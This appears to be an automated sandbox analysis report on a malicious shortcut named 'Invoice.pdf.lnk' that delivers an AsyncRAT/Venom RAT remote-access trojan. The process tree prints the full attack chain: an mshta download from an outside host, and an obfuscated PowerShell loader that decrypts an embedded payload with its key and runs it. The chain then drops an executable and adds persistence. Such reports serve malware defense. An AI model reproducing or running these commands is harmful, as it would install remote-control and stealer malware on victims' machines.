Analysis

  • max time kernel
    296s
  • max time network
    307s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16-05-2024 14:34

General

  • Target

    Invoice.pdf.lnk

  • Size

    148KB

  • MD5

    d39a73de9f109e3dba408e9481998206

  • SHA1

    30651dada81443db0fde9c3a336955d27b6d9024

  • SHA256

    84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30

  • SHA512

    09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61

  • SSDEEP

    24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

Mutex

sqhylkrhlwjrecxiv

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3812
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
          4⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function NDkpzB($PbutE){return -split ($PbutE -replace '..', '0x$& ')};$FgMPQtR = NDkpzB('3D2E22BEE13CCFE8B668DFE3870189AB65FC83A106ED0669AD4641C874CEFC917EC535ADDF89DF1FC0D291409C73E835B9F5E70CF0828A29B1A99FCA6F796F2A42503EAD3E20FB474BFCCBC35604C7DF567229A99309C37991C3C06D087F748ACC4BC05F5B87FDD9577382DC5E78E9AF8F258959DBD417148594A4E69F30F8BA09721A811C9154BF4F46C61B027E5E341F93E46D8A20C8C29F4EC25E5C686A83F3F134C5E02359C71996DDDA3CB61DC08A2EB6BE0D3BB39C00E9CD6C5B8E50425065FA05BE50EB58A186392882ABB24FD4D0628687F1E075817F6E330DC872782EC8EF3270D119F3F1EC86C7C67AB9FD26BF831DFCD080EFE275AD185384E578FB6FF21965BEBABF3D61F1298B71AA9FC44837B82550CF83C1CA66CF07FDD34B3A36310A571FD186CAA02874D83D539F0ED9044B8229A424D9B6082A7ACC921F90904F4DF72C046C6FD1C5F33D9111995AAD7C1C1DD1C2AB1663495AD4FA4A076957D6C02EA68AC2E44CCE5221002CB17CB5CE00989546834D261F7C9FEAF275945B6288E36BE0499F62C619DD95E5D74BCE21A67C9B3D7086F8A2BC180BC93D234878A2B0DE6149370967764D9A43A5B369191F8CA07CDA7F4C04EEA417515BBE36A47DB3F155508C8C012037E01E725505EA2CEF9DC3452A26D6CCCEEB8F53AB4E584DB03063509EDC34BD1631BC0D85131CD09FF34CB6F59C256EE3A3F103404A0F88BEE10B6013EBA9B9A71B168C53B1500E3EE8F5E3D826118E292F0BD55FDD0C5D4926161CC7FE9FB046F7A7A4BE387BF2C9A4CD81588044BB525721950179CD20BC45EDCF86DACC2D05515E4A58A7D4607A73C70D16BB5DF70BD51F26556B2B75F712CF6B33D805188BE16B94E6CF59787C2CAD2624B8DE1F1FD6555ADCD6B087438FE541F4E496F6A1A54088B41117481113DF53DEE84CA74EE438A319B822416D96A624AB4ADA351565AB1AB7910CB458083883D052E81D58BBD45FA51B2A392F60088ACC43D43965E09E3999B124A4D99742762C29FEE7420F1FEBEAA69BE53723E7C83A1A0A9AB74BD3474822C6D09A38219121F97EB315CC6A97AFFD96443F43BCCB405282E5D5F8C2E1607082372440DB310E54573087CA2C07CAD48324AAA6D911A31EBE54BC246CC77D449E0209925602A237BE857173875FF7CBDF566A584855FA36E7BA974C49E4AC6BA71F637954D6EC82596875886BD35B62A9C41EA16912E81F4625EFFEE2F5FCD66832EF3C439A748C8E6AA5C50B2992CA202119B2EBDB95E
CE163FC8FF7B0501C611AFDCD510A004DE882C79B433EDD9B890926856A227E5785BA964677F025837F0C62EF77D4C9D609518E415D6DDC2396A5839D383F6432318DE07919F442E2D5D455313D4A5E6414B3670D6DA8A746844B6475984E7DC5722645FAE5C2734D64606B25DD735043ABF19ACE1D00CF1455D8DCB263FE49FF6DAF30B1D278A2B024AAFA5CD490FA75A3500718CB6C2D733C645F1D96145E4F47C3B9FFAB0A80D4806F9597AB6C16648E27BAE0DBAFEBCA1B9FC9CB65F38A195E4BF3C914D7EB77DF41FEBED9252B7AA6D055220D9B1BE5316F0934D2ACF837572E54605BB44920BC30963D120BE37D1424FC57F0BC5A94530924D42DB1D03E2DF2E25F9425495C81589DAB9FE1139AE45431DCCDE27404986F8ED2458E7515A420D2F40D110D146A7F3E0566F550A052B46A6AC139EBE3CC41082CAE82EC5846FEC3099D033661D49805ED48FE4F019ECC22D5684A78CE7960DA71ED832792147A535401F1498FAE1C2C4FAECFB4DA3EBF98E01C1B81D841AA94083C26C2E7AC676E83180756C3EC3BA39F08A527D5CA7063EA91228B210D40DA1428F93986B13C10BF132D27C85801CC49F8598B105227DB80FF777FB78B8D6537584E244FF98133C299B3DCD20BE4D4BEA88D068CDBD84F54F0E419FF9F730F7FC17BB140848191A0AE77DC3182584C1F0BBA1EFE230BA6F9BD64622D0EBB1B60D55C6DD5141BD03DC8E385CF9AD75D8CE161AD6433E790579D4C316320D3BF9B609ED9BC810E661092B5D2F824ECD168E1A288B1EC23A230DFEBD019DC175FE02FB070676A7482EAC99F984A1B33F24A05624DD8E8FE3B261186010881F43CBA3AF8581D0B62D6FD371276A0A6AC713BBF10E63835C647C6808C475CFDA4B5362CFB4709875D7C86AD7B698CE71A069C32FE65523E8D3E8C40DE1149F66CD1B651698F41D98DB91312BD04A1E012D728C2FB120EB74CFF9F93D064E541C8953EE17AAD25F9A2CE3116796F26552CF5C7F08B1B73411CB6622FBFC3A56EA8D19B6513611D36C25F7AC9428174BCC5D619DB2C87759D6E0C291582A50C887CD0E72F242760BC721B1271E4732B1FBEF23833AA9EE322D775365EDD7D0C2AF9E01C3492F003338D21E90287');$UcouF = [System.Security.Cryptography.Aes]::Create();$UcouF.Key = NDkpzB('415450574E64494F4F6C5A7742707268');$UcouF.IV = New-Object byte[] 16;$seVZtfGD = $UcouF.CreateDecryptor();$mamDBHAHL = $seVZtfGD.TransformFinalBlock($FgMPQtR, 0, $FgMPQtR.Length);$bZUJiekdW = [System.Text.Encoding]::Utf8.GetString($mamDBHAHL);$seVZtfGD.Dispose();& $bZUJiekdW.Substring(0,3) 
$bZUJiekdW.Substring(3)
            5⤵
            • Blocklisted process makes network request
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4924
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf"
              6⤵
              • Checks processor information in registry
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4680
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                7⤵
                  PID:4988
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                  7⤵
                    PID:4224
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2744
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DF798C62D851F99D59E86D5962677E60 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      8⤵
                        PID:4776
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A6BF09059D224386BA9602B2A7597FDD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A6BF09059D224386BA9602B2A7597FDD 
--renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
                        8⤵
                          PID:3580
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=08076011535F7FE4AA6819D282FB1280 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          8⤵
                            PID:4864
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8DEA74F09E220C9CBBB05FA1BF1AF252 --mojo-platform-channel-handle=2396 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            8⤵
                              PID:1124
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5320A72389F761D779067CBDFA07F29A --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                              8⤵
                                PID:2336
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EF1448C09D3B4A6BA5B7CADA9AA17011 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EF1448C09D3B4A6BA5B7CADA9AA17011 
--renderer-client-id=8 --mojo-platform-channel-handle=1952 --allow-no-sandbox-job /prefetch:1
                                8⤵
                                  PID:1268
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                7⤵
                                  PID:3944
                              • C:\Users\Admin\AppData\Roaming\windefragsvc.exe
                                "C:\Users\Admin\AppData\Roaming\windefragsvc.exe"
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:464
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  7⤵
                                    PID:2932
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of SetWindowsHookEx
                                    PID:404
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3976 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
                        1⤵
                          PID:3604
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:4676

                          Network

                          MITRE ATT&CK Enterprise v15

                          Downloads

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                            Filesize

                            64KB

                            MD5

                            bf2aceeb9b9c1864a1a868cf16335948

                            SHA1

                            5fc243c3c9e2411064e8df4c0794ba3a5bb252c4

                            SHA256

                            6650122cddf96e19e1ba959a664cca249c3992b72b98607e98371ea28ec2044f

                            SHA512

                            39827dfe688a542cfe774745169fdbaedcdbb2106ccbd137a18bd172d8af11a859e7cb5daf2dd58073ebadaaa24be89aa5ba8e6e6af4b0ce22d6d5943b512600

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                            Filesize

                            36KB

                            MD5

                            b30d3becc8731792523d599d949e63f5

                            SHA1

                            19350257e42d7aee17fb3bf139a9d3adb330fad4

                            SHA256

                            b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                            SHA512

                            523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                            Filesize

                            56KB

                            MD5

                            752a1f26b18748311b691c7d8fc20633

                            SHA1

                            c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                            SHA256

                            111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                            SHA512

                            a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            235a8eb126d835efb2e253459ab8b089

                            SHA1

                            293fbf68e6726a5a230c3a42624c01899e35a89f

                            SHA256

                            5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

                            SHA512

                            a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqeevjyd.ttg.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf

                            Filesize

                            70KB

                            MD5

                            508c98b92beb1aac53108149273aeb18

                            SHA1

                            434698e85e6bf7e1989212ce99d3b3e0a6b5171d

                            SHA256

                            861b8186ac5e7157ff17abe83c9aff3856113d43adf3bae520f93d75940c9c46

                            SHA512

                            08dfe9c8809bbf0ff03add0025a29e23834b9f37f926c1b9646e5cf217e690cd77872df90a8b2a71f18beb9334a547aa0eb2d26c1fcc423f95e1c19ee42d932f

                          • C:\Users\Admin\AppData\Roaming\windefragsvc.exe

                            Filesize

                            11.7MB

                            MD5

                            4cbf5db190e95e44d2a637e3513cb39f

                            SHA1

                            0f83db9b94d8d3975116732282364ee7aa8d142f

                            SHA256

                            84c2b21f5b3c48dfb7481094b8e7f8c2f56e041fe3244b1a608bc264d83536bb

                            SHA512

                            a4d0fb58ceabe86f7f3ce81624d7ab60fcde15bed4b928eaf03ed431230052b814d0a483b67ca42afa5dbb0fd9bb02043a6c52db4b980b6fde7d0357d5773193

                          • memory/404-128-0x00000000062B0000-0x000000000634C000-memory.dmp

                            Filesize

                            624KB

                          • memory/404-129-0x0000000006350000-0x00000000063B6000-memory.dmp

                            Filesize

                            408KB

                          • memory/404-69-0x0000000000400000-0x0000000000418000-memory.dmp

                            Filesize

                            96KB

                          • memory/464-54-0x0000000000610000-0x00000000011D4000-memory.dmp

                            Filesize

                            11.8MB

                          • memory/464-56-0x0000000005C70000-0x0000000005D02000-memory.dmp

                            Filesize

                            584KB

                          • memory/464-55-0x0000000006180000-0x0000000006724000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/464-58-0x0000000005C20000-0x0000000005C2A000-memory.dmp

                            Filesize

                            40KB

                          • memory/464-59-0x00000000089F0000-0x0000000008B76000-memory.dmp

                            Filesize

                            1.5MB

                          • memory/464-64-0x0000000008B80000-0x0000000008F7E000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/3812-0-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp

                            Filesize

                            8KB

                          • memory/3812-35-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3812-13-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3812-10-0x000001F7F8320000-0x000001F7F8342000-memory.dmp

                            Filesize

                            136KB

                          • memory/4924-51-0x00000288EE2C0000-0x00000288EE2F5000-memory.dmp

                            Filesize

                            212KB

                          • memory/4924-38-0x00000288EE2C0000-0x00000288EE2F5000-memory.dmp

                            Filesize

                            212KB